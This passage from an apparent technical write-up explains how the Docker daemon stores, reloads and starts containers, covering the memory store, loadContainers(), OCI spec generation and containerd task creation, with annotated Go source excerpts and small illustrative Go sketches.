    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">NewEncoder</span><span class="p">(</span><span class="n">w</span><span class="p">)</span><span class="o">.</span><span class="n">Encode</span><span class="p">(</span><span class="n">container</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [4]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>

    <span class="k">var</span> <span class="n">deepCopy</span> <span class="n">Container</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">NewDecoder</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">)</span><span class="o">.</span><span class="n">Decode</span><span class="p">(</span><span class="o">&amp;</span><span class="n">deepCopy</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="n">deepCopy</span><span class="o">.</span><span class="n">HostConfig</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">container</span><span class="o">.</span><span class="n">WriteHostConfig</span><span class="p">()</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">container</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">WriteHostConfig</span><span class="p">()</span> <span class="p">(</span><span class="o">*</span><span class="n">containertypes</span><span class="o">.</span><span class="n">HostConfig</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">pth</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">container</span><span class="o">.</span><span class="n">HostConfigPath</span><span class="p">()</span> <span class="c">// hostconfig.json</span>
    <span class="n">f</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">atomicwriter</span><span class="o">.</span><span class="n">New</span><span class="p">(</span><span class="n">pth</span><span class="p">,</span> <span class="m">0</span><span class="n">o600</span><span class="p">)</span>
    <span class="n">w</span> <span class="o">:=</span> <span class="n">io</span><span class="o">.</span><span class="n">MultiWriter</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">,</span> <span class="n">f</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">NewEncoder</span><span class="p">(</span><span class="n">w</span><span class="p">)</span><span class="o">.</span><span class="n">Encode</span><span class="p">(</span><span class="o">&amp;</span><span class="n">container</span><span class="o">.</span><span class="n">HostConfig</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [5]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>
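
<p>The encode-once pattern in the excerpt above, where a single JSON encoding feeds both the on-disk file and an in-memory buffer that is then decoded into a deep copy, can be sketched in isolation. This is a minimal sketch and not the daemon’s code: <code class="language-plaintext highlighter-rouge">hostConfig</code>, <code class="language-plaintext highlighter-rouge">persistAndCopy()</code> and <code class="language-plaintext highlighter-rouge">demo()</code> are hypothetical names, and a plain <code class="language-plaintext highlighter-rouge">os.OpenFile()</code> stands in for the atomic writer.</p>

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"io"
	"os"
	"path/filepath"
)

// hostConfig is a hypothetical stand-in for the real HostConfig type.
type hostConfig struct {
	NetworkMode string
	Binds       []string
}

// persistAndCopy encodes cfg once, sending the bytes to both a file and an
// in-memory buffer, then decodes the buffer into an independent copy.
// Assumption: a plain file replaces the atomic writer used by the daemon.
func persistAndCopy(path string, cfg *hostConfig) (*hostConfig, error) {
	f, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0o600)
	if err != nil {
		return nil, err
	}
	defer f.Close()

	var buf bytes.Buffer
	w := io.MultiWriter(&buf, f)
	if err := json.NewEncoder(w).Encode(cfg); err != nil {
		return nil, err
	}

	var deepCopy hostConfig
	if err := json.NewDecoder(&buf).Decode(&deepCopy); err != nil {
		return nil, err
	}
	return &deepCopy, nil
}

// demo persists a config into a temporary directory, mutates the returned
// copy, and reports the first bind of the original and of the copy.
func demo() (string, string) {
	dir, err := os.MkdirTemp("", "hostconfig-demo")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)

	orig := &hostConfig{NetworkMode: "bridge", Binds: []string{"/data:/data"}}
	cp, err := persistAndCopy(filepath.Join(dir, "hostconfig.json"), orig)
	if err != nil {
		panic(err)
	}
	cp.Binds[0] = "/tmp:/tmp" // only the copy changes
	return orig.Binds[0], cp.Binds[0]
}

func main() {
	a, b := demo()
	fmt.Println(a, b)
}
```

<p>Because the copy is rebuilt from serialized bytes, it shares no slices or maps with the original, so mutating one cannot affect the other.</p>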

<p>We can see these files in the corresponding directory.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@aaa:~# <span class="nb">ls</span> <span class="nt">-al</span> /var/lib/docker/containers/2fa14c3b70546123aa4de5628bad07282085500fb48dee65adae4546b55b7128/
total 20
drwx--x--- 3 root root 4096 Jun  3 11:15 <span class="nb">.</span>
drwx--x--- 4 root root 4096 Jun  3 11:36 ..
drwx------ 2 root root 4096 Jun  3 11:15 checkpoints
<span class="nt">-rw-------</span> 1 root root 2462 Jun  3 11:15 config.v2.json
<span class="nt">-rw-------</span> 1 root root 1216 Jun  3 11:15 hostconfig.json
</code></pre></div></div>

<p>These configs are loaded into, and then served from, <code class="language-plaintext highlighter-rouge">dockerd</code>’s memory store [6], which maps each container’s ID to its container object.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/daemon.go</span>
<span class="k">type</span> <span class="n">Daemon</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">containers</span>        <span class="n">container</span><span class="o">.</span><span class="n">Store</span> <span class="c">// [6]</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// daemon/container/memory_store.go</span>
<span class="k">type</span> <span class="n">memoryStore</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">s</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="o">*</span><span class="n">Container</span>
    <span class="n">sync</span><span class="o">.</span><span class="n">RWMutex</span>
<span class="p">}</span>
</code></pre></div></div>
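
<p>To make the shape of such a store concrete, here is a minimal sketch of an ID-to-object map guarded by a <code class="language-plaintext highlighter-rouge">sync.RWMutex</code>. The trimmed <code class="language-plaintext highlighter-rouge">Container</code> type, the constructor and the two methods are written for illustration only and are not copied from the daemon’s source.</p>

```go
package main

import (
	"fmt"
	"sync"
)

// Container is a hypothetical, trimmed-down container object.
type Container struct {
	ID   string
	Name string
}

// memoryStore maps container IDs to container objects. The embedded
// RWMutex lets many readers proceed in parallel while writers get
// exclusive access.
type memoryStore struct {
	s map[string]*Container
	sync.RWMutex
}

// newMemoryStore is an illustrative constructor (an assumption).
func newMemoryStore() *memoryStore {
	return &memoryStore{s: make(map[string]*Container)}
}

// Add inserts or replaces the container stored under id.
func (m *memoryStore) Add(id string, c *Container) {
	m.Lock()
	defer m.Unlock()
	m.s[id] = c
}

// Get returns the container stored under id, or nil if there is none.
func (m *memoryStore) Get(id string) *Container {
	m.RLock()
	defer m.RUnlock()
	return m.s[id]
}

func main() {
	store := newMemoryStore()
	store.Add("2fa14c3b7054", &Container{ID: "2fa14c3b7054", Name: "demo"})
	fmt.Println(store.Get("2fa14c3b7054").Name)
	fmt.Println(store.Get("missing") == nil)
}
```

<p>A read/write lock fits this workload because lookups by ID are far more frequent than container creation or removal.</p>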

<p>Every time <code class="language-plaintext highlighter-rouge">dockerd</code> restarts, the initialization function <code class="language-plaintext highlighter-rouge">NewDaemon()</code> calls <code class="language-plaintext highlighter-rouge">loadContainers()</code> [7] to read all on-disk container configs back and cache them in the memory store, which avoids heavy disk access later.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/daemon.go</span>
<span class="k">func</span> <span class="n">NewDaemon</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">config</span> <span class="o">*</span><span class="n">config</span><span class="o">.</span><span class="n">Config</span><span class="p">,</span> <span class="n">pluginStore</span> <span class="o">*</span><span class="n">plugin</span><span class="o">.</span><span class="n">Store</span><span class="p">,</span> <span class="n">authzMiddleware</span> <span class="o">*</span><span class="n">authorization</span><span class="o">.</span><span class="n">Middleware</span><span class="p">)</span> <span class="p">(</span><span class="n">_</span> <span class="o">*</span><span class="n">Daemon</span><span class="p">,</span> <span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">containers</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">d</span><span class="o">.</span><span class="n">loadContainers</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// [7]</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">daemon</span> <span class="o">*</span><span class="n">Daemon</span><span class="p">)</span> <span class="n">loadContainers</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="p">(</span><span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="o">*</span><span class="n">container</span><span class="o">.</span><span class="n">Container</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">dir</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">os</span><span class="o">.</span><span class="n">ReadDir</span><span class="p">(</span><span class="n">daemon</span><span class="o">.</span><span class="n">repository</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">v</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">dir</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">id</span> <span class="o">:=</span> <span class="n">v</span><span class="o">.</span><span class="n">Name</span><span class="p">()</span>
        <span class="n">c</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">daemon</span><span class="o">.</span><span class="n">load</span><span class="p">(</span><span class="n">id</span><span class="p">)</span>
        <span class="n">containers</span><span class="p">[</span><span class="n">c</span><span class="o">.</span><span class="n">ID</span><span class="p">]</span> <span class="o">=</span> <span class="n">c</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
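
<p>The directory scan above can be approximated with the standard library alone. The sketch below assumes a simplified <code class="language-plaintext highlighter-rouge">config.v2.json</code> containing only <code class="language-plaintext highlighter-rouge">ID</code> and <code class="language-plaintext highlighter-rouge">Name</code>; <code class="language-plaintext highlighter-rouge">containerConfig</code>, <code class="language-plaintext highlighter-rouge">loadAll()</code> and <code class="language-plaintext highlighter-rouge">demo()</code> are hypothetical names, and the error handling is much looser than what a real daemon would need.</p>

```go
package main

import (
	"encoding/json"
	"fmt"
	"os"
	"path/filepath"
)

// containerConfig is a hypothetical subset of what config.v2.json holds.
type containerConfig struct {
	ID   string
	Name string
}

// loadAll scans root for per-container directories and decodes each
// config.v2.json into memory, keyed by container ID.
func loadAll(root string) (map[string]*containerConfig, error) {
	entries, err := os.ReadDir(root)
	if err != nil {
		return nil, err
	}
	loaded := make(map[string]*containerConfig)
	for _, e := range entries {
		if !e.IsDir() {
			continue
		}
		data, err := os.ReadFile(filepath.Join(root, e.Name(), "config.v2.json"))
		if err != nil {
			continue // skip directories that cannot be loaded
		}
		var c containerConfig
		if err := json.Unmarshal(data, &c); err != nil {
			continue // skip corrupt configs
		}
		loaded[c.ID] = &c
	}
	return loaded, nil
}

// demo builds a throwaway repository with one container and loads it back.
func demo() (int, string) {
	root, err := os.MkdirTemp("", "containers-demo")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(root)

	id := "2fa14c3b7054"
	if err := os.Mkdir(filepath.Join(root, id), 0o700); err != nil {
		panic(err)
	}
	data, err := json.Marshal(containerConfig{ID: id, Name: "demo"})
	if err != nil {
		panic(err)
	}
	if err := os.WriteFile(filepath.Join(root, id, "config.v2.json"), data, 0o600); err != nil {
		panic(err)
	}

	loaded, err := loadAll(root)
	if err != nil {
		panic(err)
	}
	return len(loaded), loaded[id].Name
}

func main() {
	n, name := demo()
	fmt.Println(n, name)
}
```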

<h3 id="12-start">1.2. Start</h3>

<p>Once the container has been created, the client sends the second request, the container-start request, to <code class="language-plaintext highlighter-rouge">dockerd</code> to actually run it.</p>

<p>Inside <code class="language-plaintext highlighter-rouge">ContainerStart()</code>, the <code class="language-plaintext highlighter-rouge">daemonCfg</code> is created to hold the current daemon (<code class="language-plaintext highlighter-rouge">dockerd</code>) configuration [1]. <code class="language-plaintext highlighter-rouge">daemon.GetContainer()</code> is then called to retrieve the matching container object from the memory store [2]. Finally, <code class="language-plaintext highlighter-rouge">containerStart()</code> is called to start the container with these configurations [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/server/router/container/container_routes.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">containerRouter</span><span class="p">)</span> <span class="n">postContainersStart</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">w</span> <span class="n">http</span><span class="o">.</span><span class="n">ResponseWriter</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">,</span> <span class="n">vars</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">backend</span><span class="o">.</span><span class="n">ContainerStart</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">vars</span><span class="p">[</span><span class="s">"name"</span><span class="p">],</span> <span class="n">r</span><span class="o">.</span><span class="n">Form</span><span class="o">.</span><span class="n">Get</span><span class="p">(</span><span class="s">"checkpoint"</span><span class="p">),</span> <span class="n">r</span><span class="o">.</span><span class="n">Form</span><span class="o">.</span><span class="n">Get</span><span class="p">(</span><span class="s">"checkpoint-dir"</span><span class="p">));</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// daemon/start.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">daemon</span> <span class="o">*</span><span class="n">Daemon</span><span class="p">)</span> <span class="n">ContainerStart</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">name</span> <span class="kt">string</span><span class="p">,</span> <span class="n">checkpoint</span> <span class="kt">string</span><span class="p">,</span> <span class="n">checkpointDir</span> <span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">daemonCfg</span> <span class="o">:=</span> <span class="n">daemon</span><span class="o">.</span><span class="n">config</span><span class="p">()</span> <span class="c">// [1]</span>
    <span class="c">// [...]</span>
    <span class="n">ctr</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">daemon</span><span class="o">.</span><span class="n">GetContainer</span><span class="p">(</span><span class="n">name</span><span class="p">)</span> <span class="c">// [2]</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">daemon</span><span class="o">.</span><span class="n">containerStart</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">daemonCfg</span><span class="p">,</span> <span class="n">ctr</span><span class="p">,</span> <span class="n">checkpoint</span><span class="p">,</span> <span class="n">checkpointDir</span><span class="p">,</span> <span class="no">true</span><span class="p">)</span> <span class="c">// [3]</span>
<span class="p">}</span>

<span class="c">// daemon/daemon.go</span>
<span class="k">type</span> <span class="n">configStore</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">config</span><span class="o">.</span><span class="n">Config</span>

    <span class="n">Runtimes</span> <span class="n">runtimes</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">containerStart()</code> does four things. First, it <strong>generates the container’s OCI spec</strong> [4], which determines the container’s runtime environment. Then it <strong>creates a container on the <code class="language-plaintext highlighter-rouge">containerd</code> side</strong> [5].</p>

<p>You may wonder why another container has to be created when one already exists. The two creations happen at different layers. The first is triggered by <code class="language-plaintext highlighter-rouge">docker create ...</code> and stores the metadata and config objects on the filesystem; it is <strong>for <code class="language-plaintext highlighter-rouge">dockerd</code></strong>.</p>

<p>This second creation is for the <strong><code class="language-plaintext highlighter-rouge">containerd</code>-level</strong> container object: <code class="language-plaintext highlighter-rouge">containerd</code> inserts a record describing the OCI spec and the shim/runtime into its database.</p>

<p>After that, <code class="language-plaintext highlighter-rouge">dockerd</code> asks <code class="language-plaintext highlighter-rouge">containerd</code> to <strong>create a task</strong> [6]. A task is the <code class="language-plaintext highlighter-rouge">containerd</code>-level handle for the running container; creating it starts the shim daemon, which in turn creates the init process. At this point the task is created but stopped, waiting to be unblocked before it executes the entrypoint binary.</p>

<p>Finally, <code class="language-plaintext highlighter-rouge">dockerd</code> calls <code class="language-plaintext highlighter-rouge">tsk.Start()</code> [7] to <strong>start the task</strong>. This indirectly tells the shim daemon to unblock the init process, which then executes the entrypoint binary and becomes the container.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/start.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">daemon</span> <span class="o">*</span><span class="n">Daemon</span><span class="p">)</span> <span class="n">containerStart</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">daemonCfg</span> <span class="o">*</span><span class="n">configStore</span><span class="p">,</span> <span class="n">container</span> <span class="o">*</span><span class="n">container</span><span class="o">.</span><span class="n">Container</span><span class="p">,</span> <span class="n">checkpoint</span> <span class="kt">string</span><span class="p">,</span> <span class="n">checkpointDir</span> <span class="kt">string</span><span class="p">,</span> <span class="n">resetRestartManager</span> <span class="kt">bool</span><span class="p">)</span> <span class="p">(</span><span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// ... container setting</span>
    <span class="c">// 1. build OCI spec</span>
    <span class="n">spec</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">daemon</span><span class="o">.</span><span class="n">createSpec</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">daemonCfg</span><span class="p">,</span> <span class="n">container</span><span class="p">,</span> <span class="n">mnts</span><span class="p">)</span> <span class="c">// [4]</span>
    
    <span class="c">// [...]</span>
    <span class="c">// 2. create a container (containerd.services.containers.v1.Containers/Create)</span>
    <span class="n">ctr</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">libcontainerd</span><span class="o">.</span><span class="n">ReplaceContainer</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">daemon</span><span class="o">.</span><span class="n">containerd</span><span class="p">,</span> <span class="n">container</span><span class="o">.</span><span class="n">ID</span><span class="p">,</span> <span class="n">spec</span><span class="p">,</span> <span class="n">shim</span><span class="p">,</span> <span class="n">createOptions</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">client</span> <span class="o">*</span><span class="n">containerd</span><span class="o">.</span><span class="n">Client</span><span class="p">,</span> <span class="n">c</span> <span class="o">*</span><span class="n">containers</span><span class="o">.</span><span class="n">Container</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span> <span class="c">// [5]</span>
        <span class="c">// [...]</span>
        <span class="n">is</span><span class="p">,</span> <span class="n">ok</span> <span class="o">:=</span> <span class="n">daemon</span><span class="o">.</span><span class="n">imageService</span><span class="o">.</span><span class="p">(</span><span class="o">*</span><span class="n">mobyc8dstore</span><span class="o">.</span><span class="n">ImageService</span><span class="p">)</span>
        <span class="n">img</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">is</span><span class="o">.</span><span class="n">ResolveImage</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">container</span><span class="o">.</span><span class="n">Config</span><span class="o">.</span><span class="n">Image</span><span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="n">c</span><span class="o">.</span><span class="n">Image</span> <span class="o">=</span> <span class="n">img</span><span class="o">.</span><span class="n">Name</span>
        <span class="k">return</span> <span class="no">nil</span>
    <span class="p">})</span>

    <span class="c">// [...]</span>
    <span class="c">// 3. create a task (containerd.services.tasks.v1.Tasks/Create)</span>
    <span class="n">tsk</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">ctr</span><span class="o">.</span><span class="n">NewTask</span><span class="p">(</span><span class="c">/* ... */</span><span class="p">)</span> <span class="c">// [6]</span>

    <span class="c">// [...]</span>
    <span class="c">// 4. start the task (containerd.services.tasks.v1.Tasks/Start)</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">tsk</span><span class="o">.</span><span class="n">Start</span><span class="p">(</span><span class="n">context</span><span class="o">.</span><span class="n">WithoutCancel</span><span class="p">(</span><span class="n">ctx</span><span class="p">));</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [7]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<h4 id="121-create-the-oci-spec">1.2.1. Create the OCI spec</h4>

<p><code class="language-plaintext highlighter-rouge">createSpec()</code> generates the OCI spec. It first gets the default spec [1] and registers config-parsing callbacks [2]. Later, the callbacks are invoked to modify the OCI spec [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/oci_linux.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">daemon</span> <span class="o">*</span><span class="n">Daemon</span><span class="p">)</span> <span class="n">createSpec</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">daemonCfg</span> <span class="o">*</span><span class="n">configStore</span><span class="p">,</span> <span class="n">c</span> <span class="o">*</span><span class="n">container</span><span class="o">.</span><span class="n">Container</span><span class="p">,</span> <span class="n">mounts</span> <span class="p">[]</span><span class="n">container</span><span class="o">.</span><span class="n">Mount</span><span class="p">)</span> <span class="p">(</span><span class="n">retSpec</span> <span class="o">*</span><span class="n">specs</span><span class="o">.</span><span class="n">Spec</span><span class="p">,</span> <span class="n">_</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">var</span> <span class="p">(</span>
        <span class="n">opts</span> <span class="p">[]</span><span class="n">coci</span><span class="o">.</span><span class="n">SpecOpts</span>
        <span class="n">s</span>    <span class="o">=</span> <span class="n">oci</span><span class="o">.</span><span class="n">DefaultSpec</span><span class="p">()</span> <span class="c">// [1]</span>
    <span class="p">)</span>
    <span class="n">opts</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">opts</span><span class="p">,</span>
        <span class="n">withCommonOptions</span><span class="p">(</span><span class="n">daemon</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">daemonCfg</span><span class="o">.</span><span class="n">Config</span><span class="p">,</span> <span class="n">c</span><span class="p">),</span> <span class="c">// [2]</span>
        <span class="c">// [...]</span>
    <span class="p">)</span>
    <span class="c">// apply the option callbacks to the spec</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">s</span><span class="p">,</span> <span class="n">coci</span><span class="o">.</span><span class="n">ApplyOpts</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">daemon</span><span class="o">.</span><span class="n">containerdClient</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">containers</span><span class="o">.</span><span class="n">Container</span><span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="n">ID</span><span class="o">:</span>          <span class="n">c</span><span class="o">.</span><span class="n">ID</span><span class="p">,</span>
        <span class="n">Snapshotter</span><span class="o">:</span> <span class="n">snapshotter</span><span class="p">,</span>
        <span class="n">SnapshotKey</span><span class="o">:</span> <span class="n">snapshotKey</span><span class="p">,</span>
    <span class="p">},</span> <span class="o">&amp;</span><span class="n">s</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">ApplyOpts</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">client</span> <span class="n">Client</span><span class="p">,</span> <span class="n">c</span> <span class="o">*</span><span class="n">containers</span><span class="o">.</span><span class="n">Container</span><span class="p">,</span> <span class="n">s</span> <span class="o">*</span><span class="n">Spec</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">SpecOpts</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">o</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">opts</span> <span class="p">{</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">o</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">client</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">s</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
            <span class="k">return</span> <span class="n">err</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>
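
<p>This register-then-apply flow is the functional options pattern. The sketch below reproduces it with a heavily reduced <code class="language-plaintext highlighter-rouge">Spec</code> and a one-argument callback type; <code class="language-plaintext highlighter-rouge">withHostname()</code>, <code class="language-plaintext highlighter-rouge">withEnv()</code> and <code class="language-plaintext highlighter-rouge">applyOpts()</code> are hypothetical helpers, whereas the real callbacks also receive a context, a client and the container.</p>

```go
package main

import (
	"errors"
	"fmt"
)

// Spec is a hypothetical, heavily reduced spec.
type Spec struct {
	Hostname string
	Env      []string
}

// SpecOpt mutates a Spec. Assumption: the signature is simplified to a
// single argument for this sketch.
type SpecOpt func(s *Spec) error

// withHostname returns an option that overrides the hostname.
func withHostname(name string) SpecOpt {
	return func(s *Spec) error {
		if name == "" {
			return errors.New("hostname must not be empty")
		}
		s.Hostname = name
		return nil
	}
}

// withEnv returns an option that appends one environment entry.
func withEnv(kv string) SpecOpt {
	return func(s *Spec) error {
		s.Env = append(s.Env, kv)
		return nil
	}
}

// applyOpts runs each option in order and stops at the first error.
func applyOpts(s *Spec, opts ...SpecOpt) error {
	for _, o := range opts {
		if err := o(s); err != nil {
			return err
		}
	}
	return nil
}

func main() {
	s := Spec{Hostname: "default"} // start from defaults
	opts := []SpecOpt{withHostname("web"), withEnv("PATH=/usr/bin")}
	if err := applyOpts(&s, opts...); err != nil {
		panic(err)
	}
	fmt.Println(s.Hostname, s.Env)
}
```

<p>Since options run in the order they were appended, a later option can override what an earlier one set, so the order of registration matters.</p>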

<p>If you don’t pass additional options, most fields of the default spec [4] carry over unchanged into the final generated JSON config.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/pkg/oci/defaults.go</span>
<span class="k">func</span> <span class="n">DefaultSpec</span><span class="p">()</span> <span class="n">specs</span><span class="o">.</span><span class="n">Spec</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">DefaultLinuxSpec</span><span class="p">()</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">DefaultLinuxSpec</span><span class="p">()</span> <span class="n">specs</span><span class="o">.</span><span class="n">Spec</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">specs</span><span class="o">.</span><span class="n">Spec</span><span class="p">{</span> <span class="c">// [4]</span>
        <span class="c">// [...]</span>
        <span class="n">Process</span><span class="o">:</span> <span class="o">&amp;</span><span class="n">specs</span><span class="o">.</span><span class="n">Process</span><span class="p">{</span>
            <span class="n">Capabilities</span><span class="o">:</span> <span class="o">&amp;</span><span class="n">specs</span><span class="o">.</span><span class="n">LinuxCapabilities</span><span class="p">{</span>
                <span class="n">Bounding</span><span class="o">:</span>  <span class="n">caps</span><span class="o">.</span><span class="n">DefaultCapabilities</span><span class="p">(),</span>
                <span class="n">Permitted</span><span class="o">:</span> <span class="n">caps</span><span class="o">.</span><span class="n">DefaultCapabilities</span><span class="p">(),</span>
                <span class="n">Effective</span><span class="o">:</span> <span class="n">caps</span><span class="o">.</span><span class="n">DefaultCapabilities</span><span class="p">(),</span>
            <span class="p">},</span>
        <span class="p">},</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
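
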